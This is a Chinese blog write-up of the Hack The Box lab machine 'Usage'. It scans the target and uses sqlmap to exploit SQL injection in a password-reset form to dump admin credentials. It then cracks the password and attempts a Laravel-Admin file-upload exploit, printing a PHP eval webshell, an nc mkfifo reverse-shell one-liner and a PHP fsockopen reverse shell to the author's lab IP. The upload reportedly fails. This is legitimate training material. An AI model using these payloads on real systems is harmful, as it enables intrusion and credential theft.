HTB靶场1 Usage

已于 2024-04-25 11:08:18 修改
阅读量1.1k 收藏 10
点赞数 4
分类专栏: DC靶场 文章标签: 安全
于 2024-04-18 00:19:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62438849/article/details/137792496
版权

可以参考这个Hack The Box - 如何开始。 - Black--Horse - 博客园 (cnblogs.com)

点击machines 选择Usage  点击Edit connection

下载文件.ovpn

把下载的文件复制到kali

然后 sudo openvpn 文件.ovpn

查看 ifconfig 可以看到自己的ip和网站给的ip符合

也可以看到 靶机ip 10.10.11.18

nmap扫描 22、80端口

访问网站看一下

本来我输入的ip  却出现了域名

然后我在/etc/host加了一个ip和域名对应关系

网页是这样的

插件查看服务器版本信息

用的框架是Laravel

现在需要上传shell ,那就需要找到漏洞

点击admin发现

又在/etc/host添加10.10.11.18   admin.usage.htb

访问

Usage网页我随便注册了个账户,可以登录

有一些精选博客的内容,说了一些网络渗透之类的

隐藏目录扫描,

dirb http://xxx

看到这么多表单(各种登录、输入框,可能有sql注入)

点击重置密码处 然后抓包

输了个1 ,会提示这个邮箱,在数据库记录里不匹配

可以知道,这个输入框的名称是 email

用sqlmap

sqlmap -u "http://usage.htb/forget-password"  --level 5 --risk 3 --data "email=1" --batch

说没有注入

换一个方法

抓包的结果右键保存到文件

sqlmap -r package2 --level 5 --risk 3 -p email --batch

确实有sql注入

列数据库

sqlmap -r package2 --level 5 --risk 3 -p email --dbs --batch

速度有点慢加上 --threads 10

列出 usage_blog数据的表

sqlmap -r package2 --level 5 --risk 3 -p email -D  usage_blog --tables --threads 10 --batch 

列出表的字段  admin_users

sqlmap -r package2 --level 5 --risk 3 -p email -D  usage_blog -T admin_users --columns  --threads 10 --batch

如果直接复制语句,可能出现有些选项不是蓝色 ,有些参数不应该是蓝色,可以增加再删除空格

实在是太慢了,就不等它列完

列出username,password的值

sqlmap -r package2 --level 5 --risk 3 -p email --batch -D usage_blog -T admin_users -C username,password --dump --threads 10

hydra 靶机ip ssh -f -L pass.txt -P pass.txt -t 20   用于ssh密码爆破

john  pass.txt 暴力破解密码

得到密码 whatever1

登录网页 可以看到具体的版本信息 Laravel version  10.18.0

看一下有无版本漏洞 好像是没有

参考其它博客的  有漏洞CVE-2023-24249 CVE-2023-24249 | flyD

Laravel-Admin是Laravel的管理界面生成器,它可以帮助您只用几行代码即可构建CRUD后端。Laravel-Admin V1.8.19中的任意文件上传漏洞允许攻击者通过精心制作的PHP文件执行任意代码

上传图片,后缀名添加.php ,未上传成功

一句话木马<?php @eval($_POST['123']);?> 但这个要用蚁剑连接 不用它

ip是自己kali的ip 因为是反向连接

可以用这个

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 7777 >/tmp/f

我用到下面这个

<?php $sock = fsockopen("10.10.14.12", "6666"); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_close($process);?>

创建文件

上传

抓包修改  文件后缀名加上.php

监听nc -lvp 6666

但是我的抓包后发送,网页是419

然后我上传一张正常的图片也是419

总之就是头像上传不成功,上传不了shell

后面的内容也没法做了

参考:

HTB - Usage | My Pentest Book (gitbook.io)

MOMO8849
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
htb
03-11
相关项目。
Usage - hackthebox
tanbinn的博客
05-31 1193
hackthebox的Usage靶场
[Meachines][Easy] Usage
04-18 1147
#SQLI #CVE-2023-24249 #monitrc #ln #7za
Linux/Usage
ve9etable的博客
04-22 963
首先使用 nmap 默认配置扫描系统端口对外开放情况,发现对外开放了 22 和 80 端口,然后又扫描了这两个端口的详细信息,情况如下可以看到 80 端口运行着 http,使用了 nginx,并且提示无法访问 http://usage.htb,将域名添加至 /etc/hosts 文件中。
HTB靶场系列】Bastard
Ms08067安全实验室
07-28 232
点击星标,即时接收最新推文#01实验信息靶机:10.10.10.9Kali:10.10.16.2#02实验过程靶机打开的端口很少,接下来扫描端口的详细信息根据信息可以得出靶机是IIS搭建的,网站有robots.txt里面有很多可用信息接下来 再对靶机进行 常用漏洞脚本扫描 以及 常见UDP端口扫描,没有什么出现其他的可用信息那么这里的突破口就主要就是80端口通过刚刚nmap的扫描结果得出靶机用的是...
HTB单线策略测试
08-18
1. **配置层次结构**:HTB的层次结构由父类和子类构成,每个类有自己的令牌桶,可以通过设定不同的令牌生成速率来控制其带宽。测试时,我们需要确保层次结构的正确设置,以实现预期的带宽分配。 2. **带宽限制与...
ROS PCQ HTB.rar
10-23
1. **ROS网络架构**:ROS网络由节点、话题、服务和参数等组件构成。节点之间通过TCP或UDP协议进行通信,话题是节点间共享数据的主要方式,而服务则用于请求-响应式的交互。 2. **ROS通信效率**:由于机器人系统通常...
ros脚本HTB+PCQ
01-05
1. **定义类**:创建不同优先级的数据流类别,例如,高优先级的游戏流、中优先级的视频流和低优先级的普通下载流。 2. **分配带宽**:为每个类分配相应的带宽资源,如将大部分带宽分配给游戏类,其余分配给视频和...
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 683
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
叉车ai行人防撞预警系统,前后盲区防撞报警,让行车更安全
jiuxindianzi的博客
08-20 229
九盾叉车AI防撞预警系统,含九配件,三颗摄像头监测盲区与疲劳,可选车速等配件增强安全监测。特点包括实时监测、动态规划、高精度定位、多级防撞等,全方位保障叉车操作安全
AI安全-文生图
深度安全实验室
08-15 407
AI安全-文生图
OV SSL证书:增强网站信任与安全的重要保障
alsknv的博客
08-20 993
OV SSL证书,全称为Organization Validation SSL证书,是一种需要通过验证网站或组织真实身份才能颁发的SSL证书。它不仅能为网站提供数据传输的加密功能,还能向用户展示网站的真实身份,增强用户的信任感。OV证书适用于所有需要在线信任和安全的网站,特别是电子商务网站、在线银行、金融机构以及企业门户网站等。OV SSL证书_企业验证级SSL证书-JoySSLOV是英文单词Organization Validation的缩写,即单位组织信息验证。
《向量数据库指南》——解决方案:采用安全、高性能的Milvus Cloud向量数据库,赋能Dopple AI的创新与发展
LCHub低代码社区
08-15 93
面对不断涌现的新模型和技术的快速演变,Sam和他的团队需要付出巨大的努力来保持竞争力。在未来的日子里,随着Dopple AI业务的不断壮大和技术的持续演进,我们有理由相信,Zilliz Cloud将继续发挥其关键作用,为Dopple AI的成功之路提供坚实的支撑。此外,Zilliz Cloud还提供了丰富的API和灵活的数据管理工具,使得Dopple AI的团队能够更加便捷地进行数据操作和应用开发。Zilliz Cloud作为一款全托管的向量数据库服务,不仅提供了出色的性能和安全性,还具备真正的扩展能力。
如何选择较为安全的第三方依赖版本?
极客星云-CSDN博客
08-16 161
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 351
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
API容易被攻击,如何做好API安全
dexunyun的博客
08-20 424
当前,API已成为全球重要 IT 基础设施的基石。由此,了解API安全风险以及采用WAAP解决方案等防护措施等,帮助企业构筑API安全防线,确保API安全,为维护企业安全以及业务的正常运行,确保企业可持续发展有着重要的意义。
网安新声 | 从微软“狂躁许可”漏洞事件看安全新挑战与应对策略
最新发布
WAJXY2021的博客
08-20 138
“狂躁许可”被视为继“永恒之蓝”之后,Windows上出现的又一里程碑式漏洞,其全版本影响范围与高度稳定的利用特性,再次敲响了网络安全领域的警钟。
安全靶场】-DC-8
qinjilll的博客
08-20 797
有的时候,漏洞无法使用,可能是字符的问题。解决方法:vi 文件.sh在命令行模式输入 :set ff?查看字符格式,如果是dos就不行,一定要为unix在命令行模式输入 :set ff=unix。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值